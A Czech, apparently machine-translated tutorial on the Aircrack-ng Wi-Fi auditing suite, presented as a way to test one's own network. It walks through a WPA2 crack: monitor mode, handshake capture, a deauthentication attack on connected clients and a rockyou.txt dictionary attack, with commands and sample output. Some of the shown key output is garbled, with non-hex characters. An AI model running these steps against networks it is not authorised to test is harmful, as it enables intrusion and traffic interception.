aircrack

Jak používat Aircrack-ng

Jak používat Aircrack-ng
Lidé většinou nikdy nepřemýšlejí o síti, ke které jsou připojeni. Nikdy si nemyslí, jak bezpečná je tato síť a jak moc denně riskují svá důvěrná data. Kontroly zranitelnosti ve svých sítích wifi můžete provádět pomocí velmi výkonného nástroje s názvem Aircrack-ng a Wireshark. Wireshark se používá k monitorování aktivity v síti. Aircrack-ng je spíš jako agresivní nástroj, který umožňuje hackovat a umožňovat přístup k bezdrátovým připojením. Myšlení jako vetřelce bylo vždy nejbezpečnějším způsobem, jak se chránit před hackerem. Přesné informace o akcích, které vetřelec podnikne, aby získal přístup do vašeho systému, se dozvíte o aircrack. Poté můžete provést kontroly souladu ve svém vlastním systému, abyste se ujistili, že není nezabezpečený.

Aircrack-ng je úplná sada softwaru navrženého k testování zabezpečení sítě WiFi. Nejde jen o jediný nástroj, ale o soubor nástrojů, z nichž každý plní určitý účel. Lze pracovat na různých oblastech zabezpečení wifi, jako je monitorování přístupového bodu, testování, útok na síť, rozbití sítě wifi a testování. Klíčovým cílem Aircrack je zachytit pakety a dešifrovat hashe, aby se hesla rozbila. Podporuje téměř všechna nová bezdrátová rozhraní. Aircrack-ng je vylepšená verze zastaralé sady nástrojů Aircrack, ng odkazuje na Nová generace. Některé z úžasných nástrojů, které spolupracují při plnění většího úkolu.

Airmon-ng:

Airmon-ng je součástí sady aircrack-ng, která uvádí kartu síťového rozhraní do režimu monitoru. Síťové karty obvykle přijímají pouze pakety cílené na ně, jak je definováno MAC adresou NIC, ale s airmon-ng budou přijaty také všechny bezdrátové pakety, ať už jsou pro ně zaměřeny nebo ne. Měli byste být schopni zachytit tyto pakety bez propojení nebo autentizace s přístupovým bodem. Slouží ke kontrole stavu přístupového bodu uvedením síťového rozhraní do režimu monitorování. Nejprve je třeba nakonfigurovat bezdrátové karty tak, aby zapínaly režim monitoru, poté zabít všechny procesy na pozadí, pokud si myslíte, že jim jakýkoli proces narušuje. Po ukončení procesů lze režim monitorování na bezdrátovém rozhraní aktivovat spuštěním následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo airmon-ng start wlan0 #

Režim monitoru můžete také deaktivovat zastavením airmon-ng kdykoli pomocí níže uvedeného příkazu:

[chráněno e-mailem]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng se používá k vypsání všech sítí, které nás obklopují, a k prohlížení cenných informací o nich. Základní funkcí airodump-ng je čichání paketů, takže je v podstatě naprogramováno tak, aby uchopilo všechny pakety kolem nás, zatímco je v režimu monitorování. Spustíme jej proti všem připojením kolem nás a shromáždíme data, jako je počet klientů připojených k síti, jejich odpovídající adresy MAC, styl šifrování a názvy kanálů, a poté začneme cílit na naši cílovou síť.

Zadáním příkazu airodump-ng a zadáním názvu síťového rozhraní jako parametru můžeme tento nástroj aktivovat. Zobrazí seznam všech přístupových bodů, množství datových paketů, použitých metod šifrování a autentizace a název sítě (ESSID). Z hlediska hackerství jsou nejdůležitějšími poli adresy MAC.

[chráněno e-mailem]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack se používá k prolomení hesla. Po zachycení všech paketů pomocí airodump můžeme klíč rozbít aircrackem. Tyto klíče prolomí pomocí dvou metod PTW a FMS. Přístup PTW se provádí ve dvou fázích. Nejprve se používají pouze pakety ARP a teprve poté, pokud klíč po prohledání nepraskne, použije všechny ostatní zachycené pakety. Plus bodem přístupu PTW je, že ne všechny pakety jsou použity pro crackování. Ve druhém přístupu, tj.E., FMS, k prolomení klíče používáme jak statistické modely, tak algos hrubou silou. Lze také použít slovníkovou metodu.

Aireplay-ng:

Airplay-ng zavádí pakety do bezdrátové sítě za účelem vytvoření nebo zrychlení provozu. Pakety ze dvou různých zdrojů lze zachytit pomocí aireplay-ng. První je živá síť a druhá pakety z již existujícího souboru pcap. Airplay-ng je užitečné během útoku na zrušení autentizace, který je zaměřen na bezdrátový přístupový bod a uživatele. Kromě toho můžete provádět některé útoky, jako je útok na kávu latte, pomocí airplay-ng, nástroje, který vám umožní získat klíč ze systému klienta.  Toho můžete dosáhnout zachycením paketu ARP a následnou manipulací s ním a jeho odesláním zpět do systému. Klient poté vytvoří paket, který lze zachytit airodumpem a aircrack rozbije klíč z tohoto upraveného paketu. Některé další možnosti útoku airplay-ng zahrnují chopchop, fragment arepreplay atd.

Airbase-ng:

Airbase-ng se používá k transformaci počítače vetřelce na kompromitovaný bod připojení, ke kterému se ostatní mohou připojit. Pomocí Airbase-ng se můžete prohlašovat za legální přístupový bod a provádět útoky typu man-in-the-middle na počítače připojené k vaší síti. Tyto druhy útoků se nazývají Evil Twin Attacks. Pro základní uživatele je nemožné rozlišit mezi legálním přístupovým bodem a falešným přístupovým bodem. Takže hrozba dvojčete zla patří mezi nejohroženější bezdrátové hrozby, kterým dnes čelíme.

Airolib-ng:

Airolib urychluje hackerský proces ukládáním a správou seznamů hesel a přístupového bodu. Systém správy databází používaný tímto programem je SQLite3, který je většinou k dispozici na všech platformách. Prolomení hesla zahrnuje výpočet párového hlavního klíče, kterým se extrahuje soukromý přechodný klíč (PTK). Pomocí PTK můžete určit identifikační kód rámcové zprávy (MIC) pro daný paket a teoreticky najít MIC jako podobný paketu, takže pokud měl PTK pravdu, měl pravdu i PMK.

Chcete-li zobrazit seznamy hesel a přistupovat k sítím uloženým v databázi, zadejte následující příkaz:

[chráněno e-mailem]: ~ $ sudo airolib-ng testdatabase -stats

Zde je testdatabase db, ke kterému chcete přistupovat nebo jej vytvořit, a -stats je operace, kterou na něm chcete provést. V databázových polích můžete provádět více operací, například dát maximální prioritu nějakému SSID nebo tak něco. Chcete-li použít airolib-ng s aircrack-ng, zadejte následující příkaz:

[chráněno e-mailem]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapol.víčko

Zde používáme již vypočítané PMK uložené v testdatabase pro urychlení procesu prolomení hesla.

Praskání WPA / WPA2 pomocí Aircrack-ng:

Podívejme se na malý příklad toho, co může aircrack-ng dělat pomocí několika jeho úžasných nástrojů.  Praskneme předem sdílený klíč sítě WPA / WPA2 pomocí slovníku.

První věcí, kterou musíme udělat, je vypsat síťová rozhraní, která podporují režim sledování. To lze provést pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo airmon-ng
Čipová sada ovladače rozhraní PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vidíme rozhraní; nyní musíme uvést síťové rozhraní, které jsme našli (wlx0), do režimu monitoru pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo airmon-ng start wlx0

Na volaném rozhraní povolil režim sledování wlx0mon.

Nyní bychom měli začít poslouchat vysílání okolních směrovačů prostřednictvím našeho síťového rozhraní, které jsme uvedli do režimu sledování.

[chráněno e-mailem]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Uplynulý: 30 s] [2020-12-02 00:17
 
Majáky BSSID PWR #Data, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31-45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
Sonda BSSID STATION PWR Rate Lost Frames
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Naše cílová síť je Crackit v tomto případě, který aktuálně běží na kanálu 1.

Tady, abychom prolomili heslo cílové sítě, musíme zachytit čtyřcestný handshake, ke kterému dochází, když se zařízení pokusí připojit k síti. Můžeme to zachytit pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-C         : Kanál

-bssid: Bssid cílové sítě

-w        : Název adresáře, kam bude umístěn soubor pcap

Nyní musíme počkat, až se zařízení připojí k síti, ale existuje lepší způsob, jak zachytit handshake. Můžeme deauthentikovat zařízení na AP pomocí deauthentikačního útoku pomocí následujícího příkazu:

[chráněno e-mailem]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

A: Bssid cílové sítě

-0: Útok na odhalování

Odpojili jsme všechna zařízení a nyní musíme počkat, až se zařízení připojí k síti.

CH 1] [Uplynulý: 30 s] [2020-12-02 00:02] [Podání WPA: E4: 6F: 13: 04: CE: 31
 
Majáky BSSID PWR RXQ #Data, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31-47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
Sonda BSSID STATION PWR Rate Lost Frames
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7 E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Dostali jsme zásah a při pohledu do pravého horního rohu hned vedle času vidíme, že byl zachycen handshake. Nyní se podívejte do zadané složky ( /Domov v našem případě) za „.pcap“Soubor.

Abychom prolomili klíč WPA, můžeme použít následující příkaz:

[chráněno e-mailem]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 handshake.víčko
b: Bssid cílové sítě
-a2: režim WPA2
Rockyou.txt: Použitý soubor slovníku
Potřesení rukou.cap: Soubor, který obsahuje zachycené handshake
Aircrack-ng 1.2 beta3
[00:01:49] Testováno 10 566 klíčů (1017.96 k / s)
KLÍČ NALEZEN! [ dostal jsi mě ]
Hlavní klíč: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Přechodný klíč: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Klíč k naší cílové síti byl úspěšně prolomen.

Závěr:

Bezdrátové sítě jsou všude, používají je všechny společnosti, od pracovníků používajících chytré telefony až po průmyslová řídicí zařízení. Podle průzkumu bude téměř 20 procent internetového provozu přes WiFi v roce 2021.  Bezdrátové sítě mají mnoho výhod, komunikaci venku, rychlý přístup k internetu v místech, kde je téměř nemožné pokládat vodiče, mohou rozšířit síť bez instalace kabelů pro jiného uživatele a snadno připojit mobilní zařízení k vašim domácím kancelářím, i když nejste nejsem tam.

Navzdory těmto výhodám je o vašem soukromí a bezpečnosti velký otazník. Protože tyto sítě; v dosahu přenosu směrovačů jsou otevřené všem, mohou být snadno napadeni a vaše data mohou být snadno ohrožena. Například pokud jste připojeni k nějaké veřejné wifi, kdokoli připojený k této síti může snadno zkontrolovat váš síťový provoz pomocí nějaké inteligence a pomocí úžasných dostupných nástrojů a dokonce jej vypsat.

Hry Nainstalujte si nejnovější strategickou hru OpenRA na Ubuntu Linux
Nainstalujte si nejnovější strategickou hru OpenRA na Ubuntu Linux
OpenRA je herní engine Libre / Free Real Time Strategy, který obnovuje rané hry Westwood, jako je klasický Command & Conquer: Red Alert. Distribuované...
Hry Nainstalujte si nejnovější Dolphin Emulator pro Gamecube a Wii na Linuxu
Nainstalujte si nejnovější Dolphin Emulator pro Gamecube a Wii na Linuxu
Emulátor Dolphin vám umožní hrát vybrané hry Gamecube a Wii na osobních počítačích se systémem Linux (PC). Jako volně dostupný herní emulátor s otevř...
Hry Jak používat GameConqueror Cheat Engine v Linuxu
Jak používat GameConqueror Cheat Engine v Linuxu
Tento článek popisuje průvodce používáním cheatovacího modulu GameConqueror v systému Linux. Mnoho uživatelů, kteří hrají hry v systému Windows, často...